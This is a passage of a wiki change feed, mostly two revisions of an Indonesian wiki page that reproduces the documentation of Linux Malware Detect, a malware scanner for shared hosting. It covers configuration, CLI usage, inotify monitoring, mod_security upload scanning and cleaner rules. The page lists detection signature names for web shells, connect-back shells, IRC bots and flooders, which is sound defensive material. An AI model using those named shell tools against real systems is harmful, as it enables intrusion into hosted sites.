* Kumpulan dokumentasi Howto Linux yang lebih lengkap - http://opensource.telkompspeedy.com/speedyorari/index.php?dir=library/library-sw-hw/linux-howto&lt;br /&gt;
* Kumpulan Buku-buku detail berbagai teknik menggunakan Linux - http://opensource.telkompspeedy.com/speedyorari/index.php?dir=library/library-sw-hw/linux-guide&lt;br /&gt;
* Beberapa Frequently Asked Question (FAQ) tentang Linux - http://opensource.telkompspeedy.com/speedyorari/index.php?dir=library/library-sw-hw/linux-faq&lt;br /&gt;
&lt;br /&gt;
[[Category: Linux]]&lt;/div&gt;</summary>
		<author><name>Adinugroho</name></author>
	</entry>
	<entry>
		<id>https://lms.onnocenter.or.id/wiki/index.php?title=User_talk:Dhonyz&amp;diff=28749</id>
		<title>User talk:Dhonyz</title>
		<link rel="alternate" type="text/html" href="https://lms.onnocenter.or.id/wiki/index.php?title=User_talk:Dhonyz&amp;diff=28749"/>
		<updated>2011-12-25T09:56:35Z</updated>

		<summary type="html">&lt;p&gt;Adinugroho: New page: kayaknya kenal deh :))&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;kayaknya kenal deh :))&lt;/div&gt;</summary>
		<author><name>Adinugroho</name></author>
	</entry>
	<entry>
		<id>https://lms.onnocenter.or.id/wiki/index.php?title=Linux_Malware_Detect&amp;diff=28748</id>
		<title>Linux Malware Detect</title>
		<link rel="alternate" type="text/html" href="https://lms.onnocenter.or.id/wiki/index.php?title=Linux_Malware_Detect&amp;diff=28748"/>
		<updated>2011-12-25T09:55:28Z</updated>

		<summary type="html">&lt;p&gt;Adinugroho: /* Pranala Luar */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;== DESKRIPSI ==&lt;br /&gt;
Linux Malware Detect (LMD) is a malware scanner for Linux released under the &lt;br /&gt;
GNU GPLv2 license, that is designed around the threats faced in shared hosted &lt;br /&gt;
environments. It uses threat data from network edge intrusion detection &lt;br /&gt;
systems to extract malware that is actively being used in attacks and &lt;br /&gt;
generates signatures for detection. In addition, threat data is also derived &lt;br /&gt;
from user submissions with the LMD checkout feature and from malware &lt;br /&gt;
community resources. The signatures that LMD uses are MD5 file hashes and HEX &lt;br /&gt;
pattern matches, they are also easily exported to any number of detection &lt;br /&gt;
tools such as ClamAV.&lt;br /&gt;
&lt;br /&gt;
The driving force behind LMD is that there is currently limited availability &lt;br /&gt;
of open source/restriction free tools for Linux systems that focus on malware &lt;br /&gt;
detection and more important that get it right. Many of the AV products that &lt;br /&gt;
perform malware detection on Linux have a very poor track record of detecting &lt;br /&gt;
threats, especially those targeted at shared hosted environments.&lt;br /&gt;
&lt;br /&gt;
The threat landscape in shared hosted environments is unique from that of the &lt;br /&gt;
standard AV products detection suite in that they are detecting primarily OS &lt;br /&gt;
level trojans, rootkits and traditional file-infecting viruses but missing &lt;br /&gt;
the ever increasing variety of malware on the user account level which serves &lt;br /&gt;
as an attack platform.&lt;br /&gt;
&lt;br /&gt;
Using the CYMRU malware hash registry, which provides malware detection data &lt;br /&gt;
for 30 major AV packages, we can demonstrate this short coming in current &lt;br /&gt;
threat detection. The following is an analysis of the core MD5 hashes (5,393) &lt;br /&gt;
in LMD 1.4.1 and the percentage of major AV products that currently detect &lt;br /&gt;
the hashes.&lt;br /&gt;
&lt;br /&gt;
KNOWN MALWARE:      1029&lt;br /&gt;
% AV DETECT (AVG):  48&lt;br /&gt;
% AV DETECT (LOW):  58&lt;br /&gt;
% AV DETECT (HIGH): 80&lt;br /&gt;
UNKNOWN MALWARE:    4364&lt;br /&gt;
&lt;br /&gt;
What this information means, is that of the of the 5,393 hashes, 81% or 4,364 &lt;br /&gt;
malware items are NOT detected / known by the top 30 major AV packages. The 1,029 &lt;br /&gt;
malware items that are known / detected have an average of a 48% detection &lt;br /&gt;
rate among major AV packages with a low / high margin of detection at 58 and &lt;br /&gt;
80 percent respective. This clearly demonstrates the lacking capacity in currently&lt;br /&gt;
available tools and why it is important that something fill the void, especially&lt;br /&gt;
in the Linux shared hosted environment.&lt;br /&gt;
&lt;br /&gt;
==FITUR==&lt;br /&gt;
&lt;br /&gt;
- MD5 file hash detection for quick threat identification&lt;br /&gt;
- HEX based pattern matching for identifying threat variants&lt;br /&gt;
- statistical analysis component for detection of obfuscated threats (e.g: base64)&lt;br /&gt;
- integrated detection of ClamAV to use as scanner engine for improved performance&lt;br /&gt;
- integrated signature update feature with -u|--update&lt;br /&gt;
- integrated version update feature with -d|--update-ver&lt;br /&gt;
- scan-recent option to scan only files that have been added/changed in X days&lt;br /&gt;
- scan-all option for full path based scanning&lt;br /&gt;
- checkout option to upload suspected malware to rfxn.com for review / hashing&lt;br /&gt;
- full reporting system to view current and previous scan results&lt;br /&gt;
- quarantine queue that stores threats in a safe fashion with no permissions&lt;br /&gt;
- quarantine batching option to quarantine the results of a current or past scans&lt;br /&gt;
- quarantine restore option to restore files to original path, owner and perms&lt;br /&gt;
- quarantine suspend account option to Cpanel suspend or shell revoke users&lt;br /&gt;
- cleaner rules to attempt removal of malware injected strings&lt;br /&gt;
- cleaner batching option to attempt cleaning of previous scan reports&lt;br /&gt;
- cleaner rules to remove base64 and gzinflate(base64 injected malware&lt;br /&gt;
- daily cron based scanning of all changes in last 24h in user homedirs&lt;br /&gt;
- daily cron script compatible with stock RH style systems, Cpanel &amp;amp; Ensim&lt;br /&gt;
- kernel based inotify real time file scanning of created/modified/moved files&lt;br /&gt;
- kernel inotify monitor that can take path data from STDIN or FILE&lt;br /&gt;
- kernel inotify monitor convenience feature to monitor system users&lt;br /&gt;
- kernel inotify monitor can be restricted to a configurable user html root&lt;br /&gt;
- kernel inotify monitor with dynamic sysctl limits for optimal performance&lt;br /&gt;
- kernel inotify alerting through daily and/or optional weekly reports&lt;br /&gt;
- HTTP upload scanning through mod_security2 inspectFile hook&lt;br /&gt;
- e-mail alert reporting after every scan execution (manual &amp;amp; daily)&lt;br /&gt;
- path, extension and signature based ignore options&lt;br /&gt;
- background scanner option for unattended scan operations&lt;br /&gt;
- verbose logging &amp;amp; output of all actions&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==SUMBER DATA THREAT==&lt;br /&gt;
&lt;br /&gt;
The defining difference with LMD is that it doesn&#039;t just detect malware based &lt;br /&gt;
on signatures/hashes that someone else generated but rather it is an &lt;br /&gt;
encompassing project that actively tracks in the wild threats and generates &lt;br /&gt;
signatures based on those real world threats that are currently circulating.&lt;br /&gt;
&lt;br /&gt;
There are four main sources for malware data that is used to generate LMD &lt;br /&gt;
signatures:&lt;br /&gt;
- Network Edge IPS: The network I manage hosts over 35,000 web sites and as &lt;br /&gt;
such receives a large amount of daily abuse, all of which is logged by our &lt;br /&gt;
network edge IPS. The IPS events are processed to extract malware url&#039;s, &lt;br /&gt;
decode POST payload and base64/gzip encoded abuse data and ultimately that &lt;br /&gt;
malware is retrieved, reviewed, classified and then signatures generated as &lt;br /&gt;
appropriate. The vast majority of LMD signatures have been derived from IPS &lt;br /&gt;
extracted data.&lt;br /&gt;
- Community Data: Data is aggregated from multiple community malware websites &lt;br /&gt;
such as clean-mx and malwaredomainlist then processed to retrieve new &lt;br /&gt;
malware, review, classify and then generate signatures.&lt;br /&gt;
- ClamAV: The HEX &amp;amp; MD5 detection signatures from ClamAV are monitored for &lt;br /&gt;
relevant updates that apply to the target user group of LMD and added to the &lt;br /&gt;
project as appropriate. To date there has been roughly 400 signatures ported &lt;br /&gt;
from ClamAV while the LMD project has contributed back to ClamAV by &lt;br /&gt;
submitting over 1,100 signatures and continues to do so on an ongoing basis.&lt;br /&gt;
- User Submission: LMD has a checkout feature that allows users to submit &lt;br /&gt;
suspected malware for review, this has grown into a very popular feature and &lt;br /&gt;
generates on average about 30-50 submissions per week.&lt;br /&gt;
&lt;br /&gt;
==UPDATE RILIS==&lt;br /&gt;
Updates to the release version of LMD are not automatically installed but can&lt;br /&gt;
be installed using the --update-ver option. There is good reasons that this is&lt;br /&gt;
not done automatically and I really dont feel like listing them so just think&lt;br /&gt;
about it a bit.&lt;br /&gt;
&lt;br /&gt;
The latest changes in the release version can always be viewed at:&lt;br /&gt;
http://www.rfxn.com/appdocs/CHANGELOG.maldetect&lt;br /&gt;
&lt;br /&gt;
==UPDATE SIGNATURE==&lt;br /&gt;
&lt;br /&gt;
The LMD signatures are updated typically once per day or more frequently&lt;br /&gt;
depending on incoming threat data from the LMD checkout feature, IPS malware&lt;br /&gt;
extraction and other sources. The updating of signatures in LMD installations&lt;br /&gt;
is performed daily through the default cron.daily script with the --update&lt;br /&gt;
option, which can be run manually at any time.&lt;br /&gt;
&lt;br /&gt;
An RSS &amp;amp; XML data source is available for tracking malware threat updates:&lt;br /&gt;
RSS Recent Signatures: http://www.rfxn.com/api/lmd&lt;br /&gt;
XML Recent Signatures: http://www.rfxn.com/api/lmd?id=recent&lt;br /&gt;
XML All Signatures:    http://www.rfxn.com/api/lmd?id=all&lt;br /&gt;
&lt;br /&gt;
==THREAT TERDETEKSI==&lt;br /&gt;
&lt;br /&gt;
LMD 1.4.1 has a total of 7,241 (5393 MD5 / 1848 HEX) signatures (before updates),&lt;br /&gt;
below is a listing of the top 60 threats by prevalence detected by LMD.&lt;br /&gt;
&lt;br /&gt;
base64.inject.unclassed    bin.dccserv.irsexxy      bin.fakeproc.Xnuxer&lt;br /&gt;
bin.ircbot.nbot            bin.ircbot.php3          bin.ircbot.unclassed&lt;br /&gt;
bin.pktflood.ABC123        bin.pktflood.osf         bin.trojan.linuxsmalli&lt;br /&gt;
c.ircbot.tsunami           exp.linux.rstb           exp.linux.unclassed&lt;br /&gt;
exp.setuid0.unclassed      gzbase64.inject          html.phishing.auc61&lt;br /&gt;
html.phishing.hsbc         perl.connback.DataCha0s  perl.connback.N2&lt;br /&gt;
perl.cpanel.cpwrap         perl.mailer.yellsoft     perl.ircbot.atrixteam&lt;br /&gt;
perl.ircbot.bRuNo          perl.ircbot.Clx          perl.ircbot.devil&lt;br /&gt;
perl.ircbot.fx29           perl.ircbot.magnum       perl.ircbot.oldwolf&lt;br /&gt;
perl.ircbot.putr4XtReme    perl.ircbot.rafflesia    perl.ircbot.UberCracker&lt;br /&gt;
perl.ircbot.xdh            perl.ircbot.xscan        perl.shell.cbLorD&lt;br /&gt;
perl.shell.cgitelnet       php.cmdshell.c100        php.cmdshell.c99&lt;br /&gt;
php.cmdshell.cih           php.cmdshell.egyspider   php.cmdshell.fx29&lt;br /&gt;
php.cmdshell.ItsmYarD      php.cmdshell.Ketemu      php.cmdshell.N3tshell&lt;br /&gt;
php.cmdshell.r57           php.cmdshell.unclassed   php.defash.buno&lt;br /&gt;
php.exe.globals            php.include.remote       php.ircbot.InsideTeam&lt;br /&gt;
php.ircbot.lolwut          php.ircbot.sniper        php.ircbot.vj_denie&lt;br /&gt;
php.mailer.10hack          php.mailer.bombam        php.mailer.PostMan&lt;br /&gt;
php.phishing.AliKay        php.phishing.mrbrain     php.phishing.ReZulT&lt;br /&gt;
php.pktflood.oey           php.shell.rc99           php.shell.shellcomm&lt;br /&gt;
&lt;br /&gt;
==SHARING DATA THREAT==&lt;br /&gt;
&lt;br /&gt;
I am a firm believer in not reinventing the wheel, for my own sanity or that&lt;br /&gt;
of others. As such all unique theat data is submitted to CYMRU &amp;amp; ClamAV so&lt;br /&gt;
that the open source and anti-malware community at large can grow from this&lt;br /&gt;
project.&lt;br /&gt;
&lt;br /&gt;
==KONFIGURASI==&lt;br /&gt;
&lt;br /&gt;
The configuration of LMD is handled through /usr/local/maldetect/conf.maldet&lt;br /&gt;
and all options are well commented for ease of configuration.&lt;br /&gt;
&lt;br /&gt;
By default LMD has the auto-qurantine of files disabled, this will mean that&lt;br /&gt;
YOU WILL NEED TO ACT on any threats detected or pass the SCANID to the &#039;-q&#039;&lt;br /&gt;
option to batch quarantine the results. To change this please set quar_hits=1&lt;br /&gt;
in conf.maldet.&lt;br /&gt;
&lt;br /&gt;
==PILIHAN YANG DIABAIKAN==&lt;br /&gt;
&lt;br /&gt;
There are four ignore files available and they break down as follows:&lt;br /&gt;
&lt;br /&gt;
/usr/local/maldetect/ignore_paths&lt;br /&gt;
A line spaced file for paths that are to be execluded from search results&lt;br /&gt;
 Sample ignore entry:&lt;br /&gt;
 /home/user/public_html/cgi-bin&lt;br /&gt;
&lt;br /&gt;
/usr/local/maldetect/ignore_file_ext&lt;br /&gt;
A line spaced file for file extensions to be excluded from search results&lt;br /&gt;
 Sample ignore entry:&lt;br /&gt;
 .js&lt;br /&gt;
 .css&lt;br /&gt;
&lt;br /&gt;
/usr/local/maldetect/ignore_sigs&lt;br /&gt;
A line spaced file for signatures that should be removed from file scanning&lt;br /&gt;
 Sample ignore entry:&lt;br /&gt;
 base64.inject.unclassed&lt;br /&gt;
&lt;br /&gt;
/usr/local/maldetect/ignore_inotify&lt;br /&gt;
A line spaced file for regexp paths that are excluded from inotify monitoring&lt;br /&gt;
 Sample ignore entry:&lt;br /&gt;
 ^/home/user$&lt;br /&gt;
 ^/var/tmp/#sql_.*\.MYD$&lt;br /&gt;
&lt;br /&gt;
==PENGGUNAAN CLI==&lt;br /&gt;
&lt;br /&gt;
Once LMD is installed it can be run through the &#039;maldet&#039; command, the &#039;--help&#039;&lt;br /&gt;
option gives a detailed summary of usage options:&lt;br /&gt;
&lt;br /&gt;
    -b, --background&lt;br /&gt;
      Execute operations in the background, ideal for large scans&lt;br /&gt;
      e.g: maldet -b -r /home/?/public_html 7&lt;br /&gt;
&lt;br /&gt;
    -u, --update&lt;br /&gt;
       Update malware detection signatures from rfxn.com&lt;br /&gt;
&lt;br /&gt;
    -d, --update-ver&lt;br /&gt;
       Update the installed version from rfxn.com&lt;br /&gt;
&lt;br /&gt;
    -m, --monitor USERS|PATHS|FILE&lt;br /&gt;
       Run maldet with inotify kernel level file create/modify monitoring&lt;br /&gt;
       If USERS is specified, monitor user homedirs for UID&#039;s &amp;gt; 500&lt;br /&gt;
       If FILE is specified, paths will be extracted from file, line spaced&lt;br /&gt;
       If PATHS are specified, must be comma spaced list, NO WILDCARDS!&lt;br /&gt;
       e.g: maldet --monitor users&lt;br /&gt;
       e.g: maldet --monitor /root/monitor_paths&lt;br /&gt;
       e.g: maldet --monitor /home/mike,/home/ashton&lt;br /&gt;
&lt;br /&gt;
    -k, --kill&lt;br /&gt;
       Terminate inotify monitoring service&lt;br /&gt;
&lt;br /&gt;
    -r, --scan-recent PATH DAYS&lt;br /&gt;
       Scan files created/modified in the last X days (default: 7d, wildcard: ?)&lt;br /&gt;
       e.g: maldet -r /home/?/public_html 2&lt;br /&gt;
&lt;br /&gt;
    -a, --scan-all PATH&lt;br /&gt;
       Scan all files in path (default: /home, wildcard: ?)&lt;br /&gt;
       e.g: maldet -a /home/?/public_html&lt;br /&gt;
&lt;br /&gt;
    -c, --checkout FILE&lt;br /&gt;
       Upload suspected malware to rfxn.com for review &amp;amp; hashing into signatures&lt;br /&gt;
&lt;br /&gt;
    -l, --log&lt;br /&gt;
       View maldet log file events&lt;br /&gt;
&lt;br /&gt;
    -e, --report SCANID email&lt;br /&gt;
       View scan report of most recent scan or of a specific SCANID and optionally&lt;br /&gt;
       e-mail the report to a supplied e-mail address&lt;br /&gt;
       e.g: maldet --report&lt;br /&gt;
       e.g: maldet --report list&lt;br /&gt;
       e.g: maldet --report 050910-1534.21135&lt;br /&gt;
       e.g: maldet --report SCANID user@domain.com&lt;br /&gt;
&lt;br /&gt;
    -s, --restore FILE|SCANID&lt;br /&gt;
       Restore file from quarantine queue to orginal path or restore all items from&lt;br /&gt;
       a specific SCANID&lt;br /&gt;
       e.g: maldet --restore /usr/local/maldetect/quarantine/config.php.23754&lt;br /&gt;
       e.g: maldet --restore 050910-1534.21135&lt;br /&gt;
&lt;br /&gt;
    -q, --quarantine SCANID&lt;br /&gt;
       Quarantine all malware from report SCANID&lt;br /&gt;
       e.g: maldet --quarantine 050910-1534.21135&lt;br /&gt;
&lt;br /&gt;
    -n, --clean SCANID&lt;br /&gt;
       Try to clean &amp;amp; restore malware hits from report SCANID&lt;br /&gt;
       e.g: maldet --clean 050910-1534.21135&lt;br /&gt;
&lt;br /&gt;
    -U, --user USER&lt;br /&gt;
       Set execution under specified user, ideal for restoring from user quarantine or&lt;br /&gt;
       to view user reports.&lt;br /&gt;
       e.g: maldet --user nobody --report&lt;br /&gt;
       e.g: maldet --user nobody --restore 050910-1534.21135&lt;br /&gt;
&lt;br /&gt;
    -co, --config-option VAR1=VALUE,VAR2=VALUE,VAR3=VALUE&lt;br /&gt;
       Set or redefine the value of conf.maldet config options&lt;br /&gt;
       e.g: maldet --config-option email_addr=you@domain.com,quar_hits=1&lt;br /&gt;
&lt;br /&gt;
    -p, --purge&lt;br /&gt;
       Clear logs, quarantine queue, session and temporary data.&lt;br /&gt;
&lt;br /&gt;
==CRON HARIAN==&lt;br /&gt;
&lt;br /&gt;
The cronjob installed by LMD is located at /etc/cron.daily/maldet and is used&lt;br /&gt;
to perform a daily update of signatures, keep the session, temp and quarantine&lt;br /&gt;
data to no more than 14d old and run a daily scan of recent file system changes.&lt;br /&gt;
&lt;br /&gt;
The daily scan supports Ensim virtual roots or standard Linux /home*/user paths,&lt;br /&gt;
such as Cpanel. The default is to just scan the web roots daily, which breaks&lt;br /&gt;
down as /home*/*/public_html or on Ensim /home/virtual/*/fst/var/www/html and&lt;br /&gt;
/home/virtual/*/fst/home/*/public_html.&lt;br /&gt;
&lt;br /&gt;
If you are running monitor mode, the daily scans will be skipped and instead a&lt;br /&gt;
daily report will be issued for all monitoring events. If you need to scan&lt;br /&gt;
additional paths, you should review the cronjob and edit it accordingly.&lt;br /&gt;
&lt;br /&gt;
==INOTIFY MONITORING==&lt;br /&gt;
&lt;br /&gt;
The inotify monitoring feature is designed to monitor users in real-time for&lt;br /&gt;
file creation/modify/move operations. This option requires a kernel that&lt;br /&gt;
supports inotify_watch (CONFIG_INOTIFY) which is found in kernels 2.6.13+&lt;br /&gt;
and CentOS/RHEL 5 by default. If you are running CentOS 4 you should consider&lt;br /&gt;
an inbox upgrade with: http://www.rfxn.com/upgrade-centos-4-8-to-5-3/&lt;br /&gt;
&lt;br /&gt;
There are three modes that the monitor can be executed with and they relate&lt;br /&gt;
to what will be monitored, they are USERS|PATHS|FILES. &lt;br /&gt;
       e.g: maldet --monitor users&lt;br /&gt;
       e.g: maldet --monitor /root/monitor_paths&lt;br /&gt;
       e.g: maldet --monitor /home/mike,/home/ashton&lt;br /&gt;
&lt;br /&gt;
The options break down as follows:&lt;br /&gt;
USERS -  The users option will take the homedirs of all system users that are&lt;br /&gt;
         above inotify_minuid and monitor them. If inotify_webdir is set then&lt;br /&gt;
         the users webdir, if it exists, will only be monitored.&lt;br /&gt;
PATHS -  A comma spaced list of paths to monitor&lt;br /&gt;
FILE  -  A line spaced file list of paths to monitor&lt;br /&gt;
&lt;br /&gt;
Once you start maldet in monitor mode, it will preprocess the paths based on&lt;br /&gt;
the option specified followed by starting the inotify process. The starting of&lt;br /&gt;
the inotify process can be a time consuming task as it needs to setup a monitor&lt;br /&gt;
hook for every file under the monitored paths. Although the startup process can&lt;br /&gt;
impact the load temporarily, once the process has started it maintains all of&lt;br /&gt;
its resources inside kernel memory and has a very small userspace footprint in&lt;br /&gt;
memory or cpu usage.&lt;br /&gt;
&lt;br /&gt;
The scanner component of the monitor watches for notifications from the inotify&lt;br /&gt;
process and batches items to be scanned, by default, every 30 seconds. If you&lt;br /&gt;
need tighter control of the scanning timer, you can edit inotify_stime in&lt;br /&gt;
conf.maldet.&lt;br /&gt;
&lt;br /&gt;
The alerting of file hits under monitor mode is handled through a daily report&lt;br /&gt;
instead of sending an email on every hit. The cron.daily job installed by LMD&lt;br /&gt;
will call an --alert-daily flag and send an alert for the last days hits. There&lt;br /&gt;
is also an --alert-weekly option that can be used, simply edit the cron at&lt;br /&gt;
/etc/cron.daily/maldet and change the --alert-daily to --alert-weekly.&lt;br /&gt;
&lt;br /&gt;
Terminating the inotify monitoring is done by passing the &#039;-k|--kill-monitor&#039;&lt;br /&gt;
option to maldet, it will touch a file handle monitored by maldet and on the&lt;br /&gt;
next waking cycle of the monitor service, it will terminate itself and all&lt;br /&gt;
inotify processes.&lt;br /&gt;
&lt;br /&gt;
==MODSECURITY2 UPLOAD SCANNING==&lt;br /&gt;
&lt;br /&gt;
The support for HTTP upload scanning is provided through mod_security2&#039;s inspectFile hook.&lt;br /&gt;
This feature allows for a validation script to be used in permitting or denying an upload. &lt;br /&gt;
&lt;br /&gt;
The convenience script to faciliate this is called modsec.sh and is located in the&lt;br /&gt;
/usr/local/maldetect installation path. The default setup is to run a standard maldet scan&lt;br /&gt;
with no clamav support, no cleaner rule executions and quarantining enabled; these options&lt;br /&gt;
are set in the interest of performance vs accuracy which is a fair tradeoff. &lt;br /&gt;
&lt;br /&gt;
The scan options can be modified in the modsec.sh file if so desired, the default&lt;br /&gt;
scan options are as follows:&lt;br /&gt;
--config-option quar_hits=1,quar_clean=0,clamav_scan=0 --modsec -a &amp;quot;$file&amp;quot;&lt;br /&gt;
&lt;br /&gt;
There is a tangible performance difference in disabling clamav scanning in this usage&lt;br /&gt;
scenario. The native LMD scanner engine is much faster than the clamav scanner engine&lt;br /&gt;
in single file scans by a wide margin. A single file scan using clamav takes roughly&lt;br /&gt;
3sec on average while the LMD scanner engine takes 0.5sec or less.&lt;br /&gt;
&lt;br /&gt;
To enable upload scanning with mod_security2 you must set enable the public_scan option&lt;br /&gt;
in conf.maldet (public_scan=1) then add the following rules to your mod_security2 &lt;br /&gt;
configuration. These rules are best placed in your modsec2.user.conf file on cpanel servers&lt;br /&gt;
or at the top of the appropraite rules file for your setup.&lt;br /&gt;
&lt;br /&gt;
/usr/local/apache/conf/modsec2.user.conf (or similar mod_security2 rules file):&lt;br /&gt;
SecRequestBodyAccess On&lt;br /&gt;
SecRule FILES_TMPNAMES &amp;quot;@inspectFile /usr/local/maldetect/modsec.sh&amp;quot; \&lt;br /&gt;
                &amp;quot;log,auditlog,deny,severity:2,phase:2,t:none&amp;quot;&lt;br /&gt;
&lt;br /&gt;
A restart of the HTTPd service is required following these changes.&lt;br /&gt;
&lt;br /&gt;
When an upload takes place that is determined to be malware, it will be rejected and an&lt;br /&gt;
entry will appear in the mod_security2 SecAuditLog file. On cpanel servers and most&lt;br /&gt;
configurations this is the modsec_audit.log located under /usr/local/apache/logs or &lt;br /&gt;
/var/log/httpd.&lt;br /&gt;
&lt;br /&gt;
The log entry will appear similar to the following:&lt;br /&gt;
Message: Access denied with code 406 (phase 2). File &amp;quot;/tmp/20111120-....-file&amp;quot; rejected by&lt;br /&gt;
the approver script &amp;quot;/usr/local/maldetect/modsec.sh&amp;quot;: 0 maldet: {HEX}php.cmdshell.r57.317&lt;br /&gt;
/tmp/20111120-....-file [file &amp;quot;/usr/local/apache/conf/modsec2.user.conf&amp;quot;] [line &amp;quot;3&amp;quot;]&lt;br /&gt;
[severity &amp;quot;CRITICAL&amp;quot;]&lt;br /&gt;
&lt;br /&gt;
The default alerting options will apply and an e-mail will be sent when hits are found. This&lt;br /&gt;
can be changed in the modsec.sh script by editing the --config-option values.&lt;br /&gt;
&lt;br /&gt;
To disable alerts append email_alert=0 to the --config-option values:&lt;br /&gt;
--config-option quar_hits=1,quar_clean=0,clamav_scan=0,email_alert=0&lt;br /&gt;
&lt;br /&gt;
To change the e-mail address for alerts on upload hits, append email_addr=you@domain.com&lt;br /&gt;
to the --config-option values:&lt;br /&gt;
--config-option quar_hits=1,quar_clean=0,clamav_scan=0,email_addr=you@domain.com&lt;br /&gt;
&lt;br /&gt;
The nature of uploads is such that they are performed either under the user that the HTTP&lt;br /&gt;
service is running as or under that of a system user in an suexec style setup (i.e: phpsuexec).&lt;br /&gt;
This required a change to the way LMD stores session, temporary and quarantine data to allow&lt;br /&gt;
for non-root users to perform scans.&lt;br /&gt;
&lt;br /&gt;
Given that the maldetect installation path is owned by user root, we either need to set a pub&lt;br /&gt;
path world writable (777) or populate the pub path with user owned paths. It was undesirable&lt;br /&gt;
to set any path world writable and as such a feature to populate path data was created. This&lt;br /&gt;
feature is controlled with the --mkpubpaths flag and is executed from cron every 10 minutes,&lt;br /&gt;
it will only execute if the public_scan variable is enabled in conf.maldet. As such, it is&lt;br /&gt;
important to make sure the public_scan variable is set to enabled (1) in conf.maldet and it is&lt;br /&gt;
advised to run &#039;maldet --mkpubpaths&#039; manually to prepopulate the user paths. There after, the&lt;br /&gt;
cron will ensure new users have paths created no later than 10 minutes after creation.&lt;br /&gt;
&lt;br /&gt;
All non-root scans, such as those performed under mod_security2, will be stored under the&lt;br /&gt;
/usr/local/maldetect/pub/username directory tree. The quarantine paths are relative to the user&lt;br /&gt;
that exectues the scan, so user nobody would be under pub/nobody/quar/. The actual paths&lt;br /&gt;
for where files are quarantined and the user which executed the scan, can be verified in the&lt;br /&gt;
e-mail reports for upload hits.&lt;br /&gt;
&lt;br /&gt;
To restore files quarantined under non-root users, you must pass the -U|--user option to LMD,&lt;br /&gt;
for example if user nobody quarantined a file you would like to restore, it can be restored as&lt;br /&gt;
follows:&lt;br /&gt;
maldet --user nobody /usr/local/maldetect/pub/nobody/quar/20111120-file-SFwTeu.22408&lt;br /&gt;
&lt;br /&gt;
Or, as always the scan ID can be used to restore&lt;br /&gt;
maldet --user nobody 112011-0032.13771&lt;br /&gt;
&lt;br /&gt;
==CLEANER RULES==&lt;br /&gt;
&lt;br /&gt;
The cleaner function looks for signature-named rules under the clean/ path,&lt;br /&gt;
these rules can consist of any command that is designed to clean a file of&lt;br /&gt;
malware. A cleaner rule must result in a file being able to pass a scan&lt;br /&gt;
without tripping a HIT otherwise it will classify the clean action as FAILED.&lt;br /&gt;
&lt;br /&gt;
Let us assume for a moment we have malware that we want to clean and it trips&lt;br /&gt;
with the signature &amp;quot;{HEX}php.cmdshell.r57.89&amp;quot;. The actual signature string in&lt;br /&gt;
this is &amp;quot;php.cmdshell.r57&amp;quot;, the &amp;quot;{HEX}&amp;quot; just defines the format and &amp;quot;.89&amp;quot; is&lt;br /&gt;
the variant number. So, to create a clean rule for php.cmdshell.r57 we would&lt;br /&gt;
add a file &#039;clean/php.cmdshell.r57&#039; and this would be executed against any&lt;br /&gt;
file that hits on the signature of the same name.&lt;br /&gt;
&lt;br /&gt;
The actual contents of the rule should be a single line command that will be&lt;br /&gt;
executed against the hit file, for example the execution looks something like:&lt;br /&gt;
&lt;br /&gt;
YOUR_COMMAND MALWARE_FILE&lt;br /&gt;
&lt;br /&gt;
So, for a string based malware injection you could easily throw in a &#039;sed -i&#039;&lt;br /&gt;
into the rule file with the appropriate pattern to strip the string(s) from&lt;br /&gt;
the file. Once the clean command has run, a rescan will be performed on the&lt;br /&gt;
file and if it causes causes a hit, the clean will be marked as FAILED. A&lt;br /&gt;
successful clean ALWAYS results in the file being restored if possible to&lt;br /&gt;
its original path, owner and mode.&lt;br /&gt;
&lt;br /&gt;
An important note is that the cleaner function is a subfunction of the&lt;br /&gt;
quarantine, so if the quarantine is disabled then by default, malware hits&lt;br /&gt;
will not have clean attempts made. There are two ways around this, apart from&lt;br /&gt;
the obvious of turning on quarantine and rescanning (which is a waste of time).&lt;br /&gt;
The best way is to enable the quarantine and then use the -q|--quarantine flag&lt;br /&gt;
to batch through the scan results, which will quarantine and clean files. The&lt;br /&gt;
second is to use the -n|--clean flag which will try to clean files in place,&lt;br /&gt;
be that in the quarantine or the files original path, wherever it can be found.&lt;br /&gt;
&lt;br /&gt;
e.g: maldet -q SCANID&lt;br /&gt;
e.g: maldet --clean SCANID&lt;br /&gt;
&lt;br /&gt;
==REFERENSI==&lt;br /&gt;
* http://www.rfxn.com/appdocs/README.maldetect&lt;br /&gt;
&lt;br /&gt;
==PRANALA MENARIK==&lt;br /&gt;
* [[Linux Howto]]&lt;/div&gt;</summary>
		<author><name>Adinugroho</name></author>
	</entry>
	<entry>
		<id>https://lms.onnocenter.or.id/wiki/index.php?title=Linux_Malware_Detect&amp;diff=28747</id>
		<title>Linux Malware Detect</title>
		<link rel="alternate" type="text/html" href="https://lms.onnocenter.or.id/wiki/index.php?title=Linux_Malware_Detect&amp;diff=28747"/>
		<updated>2011-12-25T09:51:44Z</updated>

		<summary type="html">&lt;p&gt;Adinugroho: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;== DESKRIPSI ==&lt;br /&gt;
Linux Malware Detect (LMD) is a malware scanner for Linux released under the &lt;br /&gt;
GNU GPLv2 license, that is designed around the threats faced in shared hosted &lt;br /&gt;
environments. It uses threat data from network edge intrusion detection &lt;br /&gt;
systems to extract malware that is actively being used in attacks and &lt;br /&gt;
generates signatures for detection. In addition, threat data is also derived &lt;br /&gt;
from user submissions with the LMD checkout feature and from malware &lt;br /&gt;
community resources. The signatures that LMD uses are MD5 file hashes and HEX &lt;br /&gt;
pattern matches, they are also easily exported to any number of detection &lt;br /&gt;
tools such as ClamAV.&lt;br /&gt;
&lt;br /&gt;
The driving force behind LMD is that there is currently limited availability &lt;br /&gt;
of open source/restriction free tools for Linux systems that focus on malware &lt;br /&gt;
detection and more important that get it right. Many of the AV products that &lt;br /&gt;
perform malware detection on Linux have a very poor track record of detecting &lt;br /&gt;
threats, especially those targeted at shared hosted environments.&lt;br /&gt;
&lt;br /&gt;
The threat landscape in shared hosted environments is unique from that of the &lt;br /&gt;
standard AV products detection suite in that they are detecting primarily OS &lt;br /&gt;
level trojans, rootkits and traditional file-infecting viruses but missing &lt;br /&gt;
the ever increasing variety of malware on the user account level which serves &lt;br /&gt;
as an attack platform.&lt;br /&gt;
&lt;br /&gt;
Using the CYMRU malware hash registry, which provides malware detection data &lt;br /&gt;
for 30 major AV packages, we can demonstrate this short coming in current &lt;br /&gt;
